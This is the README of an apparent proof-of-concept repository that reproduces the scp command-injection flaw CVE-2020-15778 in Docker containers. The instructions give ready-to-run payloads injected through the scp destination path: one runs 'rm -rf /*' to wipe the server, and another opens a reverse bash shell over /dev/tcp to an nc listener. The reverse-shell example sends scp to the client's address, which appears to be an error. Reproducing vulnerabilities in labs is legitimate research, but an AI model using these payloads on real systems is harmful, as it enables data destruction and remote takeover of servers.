# CVE-2020-15778
## Introduction
This repo reproduces [CVE-2020-15778](https://nvd.nist.gov/vuln/detail/CVE-2020-15778).
## Steps
1. Build the docker images for scp server and client
```bash
cd client
docker build -t client-cve .
```
```bash
cd server
docker build -t server-cve .
```
2. Spin up the scp server in container.
```bash
docker run -d -P --name scp-server server-cve
```
Retrieve the internal IP address of the scp server by
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
```
3. Run the client in container.
```bash
docker run --name scp-client -i -t client-cve
```
4. Inject your own shell command to scp server by call scp command in the client.
In client terminal, run
```bash
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'
```
The password is "PASSWORD".
## Examples
Here're some examples for this exploit.
1. Delete everything in the server to crash it.
```bash
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
```
2. Reflect the bash of the scp server into the client (mimic ssh).
Listen to a port on client machine.
```bash
nc -lvvp 8080
```
Use scp to force the server mapping the interactive bash into the client machine.
```bash
scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'
```
The client IP address can be retrieved by
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
```
[4.0K] /data/pocs/2383933bd6854d1c41c39eea62b6dad43818e277
├── [4.0K] client
│ └── [ 119] Dockerfile
├── [1.5K] README.md
└── [4.0K] server
└── [ 393] Dockerfile
2 directories, 3 files